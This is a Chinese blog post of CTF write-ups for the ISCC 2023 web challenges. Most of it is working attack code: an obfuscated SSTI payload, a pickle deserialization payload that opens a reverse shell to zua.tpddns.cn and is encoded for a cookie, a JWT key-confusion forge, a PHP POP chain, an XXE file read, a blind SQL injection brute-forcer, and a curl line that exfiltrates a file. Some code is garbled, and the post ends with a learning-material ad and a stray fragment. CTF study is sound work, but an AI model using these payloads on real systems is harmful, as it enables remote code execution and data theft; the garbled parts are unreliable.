ISCC 2023 练武题 web 所有题目_isccweb练武题(1)

2401_84967954

于 2024-05-12 13:15:07 发布

阅读量511

点赞数 3

分类专栏：程序员文章标签：前端

本文链接：https://blog.csdn.net/2401_84967954/article/details/138753067

版权

程序员专栏收录该内容

37 篇文章 0 订阅

订阅专栏

1.输入flag

发现fllaaag.txt

2.网络响应发现服务端为WSGI

猜测有模板注入

3.测试过滤内容

{{}}不能用

使用{%print()%}

4.输入{%print(config)%}查看配置

5.构造payload

(1)+.*_ class base globals等一大部分都被过滤了

(2)~可以充当连接，使用"“[”"]代替.__

(3){%print(“”[“\x5f\x5fcla”_{“ss\x5f\x5f”][“\x5F\x5Fba”}“se\x5F\x5F”]“\x5F\x5Fsubcla”~“sses\x5F\x5F”[233][“\x5F\x5Fin”_{“it\x5F\x5F”][“\x5F\x5Fglo”}“bals\x5F\x5F”][“\x5F\x5Fbuil”~“tins\x5F\x5F”]“eval”[“popen”](“cat flllaag\x2etxt|bas”~“e64”)“read”)%}

其中"“[”\x5f\x5fcla"~“ss\x5f\x5f”]=>“”[“__class__”]=>.__class__

web ISCC内部零元购-2.txt

方法一(非预期漏洞)

1.发现cookie里面是python反序列化

2.发现过滤了大部分内容，不过R指令没有过滤

3.手搓opcode（Vxxxx\nitimeit\ntimeit\nR.

4.xxxx即为替换执行代码，替换为__import__(‘os’).system(‘bash -c “bash -i >& /dev/tcp/zua.tpddns.cn/1234 0<&1 2>&1”’)

并且unicode编码即为

\u005f\u005f\u0069\u006d\u0070\u006f\u0072\u0074\u005f\u005f\u0028\u0027\u006f\u0073\u0027\u0029\u002e\u0073\u0079\u0073\u0074\u0065\u006d\u0028\u0027\u0062\u0061\u0073\u0068\u0020\u002d\u0063\u0020\u0022\u0062\u0061\u0073\u0068\u0020\u002d\u0069\u0020\u003e\u0026\u0020\u002f\u0064\u0065\u0076\u002f\u0074\u0063\u0070\u002f\u007a\u0075\u0061\u002e\u0074\u0070\u0064\u0064\u006e\u0073\u002e\u0063\u006e\u002f\u0031\u0032\u0033\u0034\u0020\u0030\u003c\u0026\u0031\u0020\u0032\u003e\u0026\u0031\u0022\u0027\u0029

5.最终payload=b’‘’(V\u005f\u005f\u0069\u006d\u0070\u006f\u0072\u0074\u005f\u005f\u0028\u0027\u006f\u0073\u0027\u0029\u002e\u0073\u0079\u0073\u0074\u0065\u006d\u0028\u0027\u0062\u0061\u0073\u0068\u0020\u002d\u0063\u0020\u0022\u0062\u0061\u0073\u0068\u0020\u002d\u0069\u0020\u003e\u0026\u0020\u002f\u0064\u0065\u0076\u002f\u0074\u0063\u0070\u002f\u007a\u0075\u0061\u002e\u0074\u0070\u0064\u0064\u006e\u0073\u002e\u0063\u006e\u002f\u0031\u0032\u0033\u0034\u0020\u0030\u003c\u0026\u0031\u0020\u0032\u003e\u0026\u0031\u0022\u0027\u0029\nitimeit\ntimeit\nR.‘’’

pickle.loads(payload)

测试通过

6.base64编码KFZcdTAwNWZcdTAwNWZcdTAwNjlcdTAwNmRcdTAwNzBcdTAwNmZcdTAwNzJcdTAwNzRcdTAwNWZcdTAwNWZcdTAwMjhcdTAwMjdcdTAwNmZcdTAwNzNcdTAwMjdcdTAwMjlcdTAwMmVcdTAwNzNcdTAwNzlcdTAwNzNcdTAwNzRcdTAwNjVcdTAwNmRcdTAwMjhcdTAwMjdcdTAwNjJcdTAwNjFcdTAwNzNcdTAwNjhcdTAwMjBcdTAwMmRcdTAwNjNcdTAwMjBcdTAwMjJcdTAwNjJcdTAwNjFcdTAwNzNcdTAwNjhcdTAwMjBcdTAwMmRcdTAwNjlcdTAwMjBcdTAwM2VcdTAwMjZcdTAwMjBcdTAwMmZcdTAwNjRcdTAwNjVcdTAwNzZcdTAwMmZcdTAwNzRcdTAwNjNcdTAwNzBcdTAwMmZcdTAwN2FcdTAwNzVcdTAwNjFcdTAwMmVcdTAwNzRcdTAwNzBcdTAwNjRcdTAwNjRcdTAwNmVcdTAwNzNcdTAwMmVcdTAwNjNcdTAwNmVcdTAwMmZcdTAwMzFcdTAwMzJcdTAwMzNcdTAwMzRcdTAwMjBcdTAwMzBcdTAwM2NcdTAwMjZcdTAwMzFcdTAwMjBcdTAwMzJcdTAwM2VcdTAwMjZcdTAwMzFcdTAwMjJcdTAwMjdcdTAwMjkKaXRpbWVpdAp0aW1laXQKUi4

替换cookie的session值即可反弹shell

cat flag.txt获取flag

方法二(预期解题思路)

SSTI模板注入

1.下载公钥文件

2.修改RS256为HS256，密钥混淆

import jwt

PUBLIC_KEY = open(‘key.txt’).read()

payload = {

“name”: “{{cycler.__init__.__globals__.os.popen(‘cat flag.txt’).read()}}”,

“exp”: 9902085613, #失效时间，随便写就好

}

header = {

“Access_IP”:“10.15.6.211”,

“alg”: “HS256”,

“typ”: “JWT”,

}

encoded = jwt.encode(payload, PUBLIC_KEY, algorithm=‘HS256’, headers=header)

print(encoded)

3.替换cookie中Auth值，并访问inner（内部商店）获取flag

#inner为第一题的内网地址

http://47.94.14.162:10009/iywqejdbcxnbamolxz238sdk

web ISCC单身节抽奖.txt

1.注册账号发现html源代码里面有一串base64编码

解码发现是PHP反序列化

2.密码设置为######“;s:4:“sdog”;i:1;s:8:“username”;s:8:”#";}0

可以替换sdog的变量，是该用户成为单身狗

3.下载存根，跳转loadzk1myHJ0vaEoT5U0j6xDOVLBw693g83S.php，发现有checktime限制时间

4.尝试后发现科学计数法可以绕过，0.5e5

5.然后可以下载网站文件，尝试下载index.php，发现被加密了

6.跑字典，下载一个apidemo.php

<?php

// 一期未完工部分：xml查询接口apiR554CvL027POp0agxkQ1bBMXnH6Ad1rz.php

// <?xml

// version=“1.0” encoding=“utf-8”

// ?>

// rocker

// singledog

// 4090Ti

7.发现是一个xxe注入漏洞

8.payload

<?xml version="1.0" encoding="utf-8"?> <!ENTITY xxe SYSTEM "file:///flag" >]>&xxe;

web ISCC疯狂购物节-1.txt

1.寻找美羊羊的base64编码 576O576K576K

import requests

import time

import os

url=“http://47.94.14.162:10001/more/get?page_number=”

headers={

‘Cookie’: ‘csrftoken=62jDmpFZNKoZOWg44yHc0wOYDIWM2Ha9xiiPpV5PuNcvmJEqBJqorQczHSr7oP7M; sessionid=riu577im8sbtirvkfq9415ov91te7h6z’

‘User-Agent’: ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.76’

‘Accept’: ‘text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9’

‘Accept-Encoding’: ‘gzip, deflate’

‘Accept-Language’: ‘zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6’

‘Cache-Control’: ‘max-age=0’

‘Connection’: ‘keep-alive’

‘Host’: ‘47.94.14.162:10001’

‘Referer’: ‘http:///47.94.14.162:10001/index/’

‘Upgrade-Insecure-Requests’: ‘1’

}

i=0

while i<126:

i+=1

try:

res=requests.get(url+str(i),headers=headers)

except:

pass

print(i,len(res.text))

#too fast

if len(res.text)==11:

time.sleep(0.5)

print(res.text)

if “576O576K576K” in res.text:

print(res.text)

if len(res.text)<1000:

i-=1

else:

#保存到文件方便查看

f=open(‘./1/’+str(i)+‘.txt’,‘w’)

f.write(res.text)

f.close

2.发现fl4g，尝试该字段

import requests

import string

from time import sleep

# 绕过 are you kidding me

cookies ={

‘csrftoken’:

‘Xx1QgCADdjAnhYNOnuV4on7hReuXXfaJ5dPy00n16ZRpegQzpy8XXHSvram7rO31’,

‘sessionid’: “q7kcs19owhq5nf42cln72dckwocgx3kd”,

}

headers = {

‘Acept’:‘text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7’,

‘Accept-Language’ : ‘zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,ja;q=0.6’,

‘Cache-Control’: ‘max-age=0’,

‘Connection’: ‘keep-alive’,

‘Upgrade-Insecure-Requests’ : ‘1’,

‘User-Agent’ : ‘Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36’,

}

def str_to_hex(string):

result = ‘’

for i in string:

result+=hex(ord(i))[2:]

return result

# 正则过滤了，只能 0x+四个字符

url = “http://47.94.14.162:10001/Details/search?id=4875610)||fl4g like binary 0x25{}{}25 %23”

alphabet=“0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$&()*+,-./:;<=>?@[]^`{|}~”

result= ‘ISCC{’

for i in range(1,100):

for ch in alphabet:

payload = url.format(str_to_hex(result[-1]),str_to_hex(ch))

print(payload)

r = requests.get(url=payload,cookies=cookies,headers=headers)

sleep(1.3)

if “too fast” in r.text:

print(“too fast”)

sleep(2)

r = requests.get(url=payload,cookies=cookies,headers=headers)

if"576O576K576K" in r.text:

print(payload)

result += ch

print(“Success:”, result)

break

爆完即可得到flag

web Where_is_your_love.txt

1.js解码发现3个文件

加密的letter.php，pem公钥，php反序列化

2.构造poc链

读取phpinfo

http://47.94.14.162:10003/LoveStory.php?iscc=O:3:%22boy%22:1:{s:4:%22like%22;O:4:%22girl%22:1:{s:7:%22boyname%22;O:6:%22helper%22:2:{s:4:%22name%22;O:3:%22boy%22:1:{s:4:%22like%22;O:6:%22helper%22:2:{s:4:%22name%22;N;s:6:%22string%22;a:1:{s:6:%22string%22;s:7:%22phpinfo%22;}}};s:6:%22string%22;s:4:%226666%22;}}}

发现"love_story::love"无法设置this变量

使用 $a = a rr a y (" s t r in g " => [$ l, “love”]);

class boy

{

public $like;

public function __destruct()

{

echo "能请你喝杯奶茶吗？

@$this->like->make_friends();

}

public function __toString()

{

echo "拱火大法好

return $this->like->string;

}

class girl

{

private $boyname;

public function __construct($a)

{

$this->boyname = $a;

}

public function __call($func, $args)

{

echo "我害羞羞

isset($this->boyname->name);

}

class helper

{

private $name; #{“string”:“love_story::love”}

private $string;

public function __construct($a, $string)

{

if ($a === 1) {

$this->name = array(‘string’ => ‘(new love_story())->love’);

var_dump($this->name);

var_dump($this->name[‘string’]);

} else {

$this->name = $a;

}

$this->string = $string;

}

public function __isset($val)

{

echo "僚机上线

echo $this->name;

}

public function __get($name)

{

echo "僚机不懈努力

$var = $t hi s - >$ name;

var_dump($var);

var_dump( $v a r [$ name]);

$v a r [$ name](); #(new love_story())->love()

}

class love_story

{

public $fall_in_love = array(“girl_and_boy”);

public function __construct()

{

echo “construct nihao”;

}

public function love()

{

echo "爱情萌芽

array_walk( $t hi s, f u n c t i o n ($ make, $colo) {

echo "坠入爱河，给你爱的密码

if ($make[0] === “girl_and_boy” && $colo === “fall_in_love”) {

global $flag;

echo $flag;

echo “good”;

}

});

}

getcwd();

$b1 = new boy();

$b2 = new boy();

$h 1 = n e w h e lp er ($ b2, “222”);

$g = n e w g i r l ($ h1);

#$a[“string”] = “love_story::love”;

$l = new love_story();

$a = a rr a y (" s t r in g " => [$ l, “love”]);

$h2 = new helper(1, $a);

$b2->like = $h2;

$b1->like = $g;

echo urlencode(serialize($b1));

获取到e3e6121b3e253c591ce407333a5e5a04272a58e7175a0b34060a5b28375e270809e13e3e3404

3.写python解密rsa

从解密网站分解n得到p，q

from Crypto.Util.number import bytes_to_long, long_to_bytes

from Crypto.PublicKey import RSA

import codecs

with open(“keyiscc.pem”, “rb”) as f:

key = RSA.import_key(f.read())

print(f"n = {key.n}")

print(f"e = {key.e}")

n = 21632595061498942456591176284485458726074437255982049051386399661866343401307576418742779935973203520468696897782308820580710694887656859447653301575912839865540207043886422473424543631000613842175006881377927881354616669050512971265340129939652367389539089568185762381769176974757484155591541925924309034566325122477217195694622210444478497422147703839359963069352123250114163369656862332886519324535078617986837018261033100555378934126290111146362437878180948892817526628614714852292454750429061910217210651682864700027396878086089765753730027466491890569705897416499997534143482201450410155650707746775053846974603

e = 65537

p = 147080233415299360057845495186390765586922902910770748924042642102066002833475419563625282038534033761523277282491713393841245804046571337610325158434942879464810055753965320619327164976752647165681046903418924945132096866002693037715397450918689064404951199247250188795306045444756953833882242163199922206967

q = 147080233415299360057845495186390765586922902910770748924042475419563625282038534033761523277282491713393841245804046571337610325158434942879464810055753965320619327164976752647165681046903418924945132096866002693037715397450918689064404951199247250188795306045444756953833882242163199922205709

with open(‘letter.php’, ‘rb’) as f:

c = f.read()

c = int.from_bytes(c, byteorder=‘big’)

phi = (p - 1) * (q - 1)

d = pow(e, -1, phi)

m = pow(c, d, n)

print(long_to_bytes(int(m)))

flag = ‘e3243907335e1c191b5a3705093a5f24582f185f11293b251f082614043e5be516e13e3e3404’

flag1 = ‘’

for i in range(0, len(flag), 2):

cc = int(flag[i:i+2], 16)

b = cc ^ 100

a = chr(b - 10)

flag1 += a

print(codecs.decode(flag1[::-1], ‘rot13’))

解密即可获取flag

web上大号说话.txt

1.输入马保国

发现.git

python反序列化

2.发现cookie加密了

from cryptography.fernet import Fernet

import base64

import threading

def crypto(base_str):

return cipher_suite.encrypt(base_str)

def generate_key(key:str):

key_byte = key.encode()

#print(key_byte)

return base64.urlsafe_b64encode(key_byte + b’0’ * 28)

def decode(t):

try:

print(cipher_suite.decrypt(t))

print(“------------”+all+“-------------------”)

except:

pass

num=0

all=‘’

for i in ‘5’:

for j in ‘abcdefghijklmnopqrstuvwsyzABCDEFGHIJKLMNOPQRSTUVWSYZ1234567890’:

for k in ‘abcdefghijklmnopqrstuvwsyzABCDEFGHIJKLMNOPQRSTUVWSYZ1234567890’:

for z in ‘abcdefghijklmnopqrstuvwsyzABCDEFGHIJKLMNOPQRSTUVWSYZ1234567890’:

#print(decode(b"gAAAAABkUlGoGqwzRa8bVl98SSXNJzKP6ArP4LeFzrM2GlaIVD9Dc8QDPa8SihQrgETZDpF3N3C3q86XEJaC-SvxeiBn5LJJTnvF3t_xYIS0KSDHniSXyS7gay2NeuXnSaKwcMCzRxzBL61b8Q3rPxGs_6b3qp_HY9wUQqbDmZpZ2WHlpFvBt6U="))

all=i+j+k+z

num+=1

if num%10000==0:

print(all)

cipher_suite=Fernet(generate_key(all))

decode(b"gAAAAABkUlGoGqwzRa8bVl98SSXNJzKP6ArP4LeFzrM2GlaIVD9Dc8QDPa8SihQrgETZDpF3N3C3q86XEJaC-SvxeiBn5LJJTnvF3t_xYIS0KSDHniSXyS7gay2NeuXnSaKwcMCzRxzBL61b8Q3rPxGs_6b3qp_HY9wUQqbDmZpZ2WHlpFvBt6U=")

解密为5MbG

3.发现没有回显

使用公网ip监听

curl zua.tpddns.cn:1234/cat flagucjbgaxqef.txt|base64

尝试R指令被过滤

4.指令构造

最后

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。

深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！

因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点！真正的体系化！

如果你觉得这些内容对你有帮助，需要这份全套学习资料的朋友可以戳我获取！！

由于文件比较大，这里只是将部分目录截图出来，每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频，并且会持续更新！

FvBt6U="))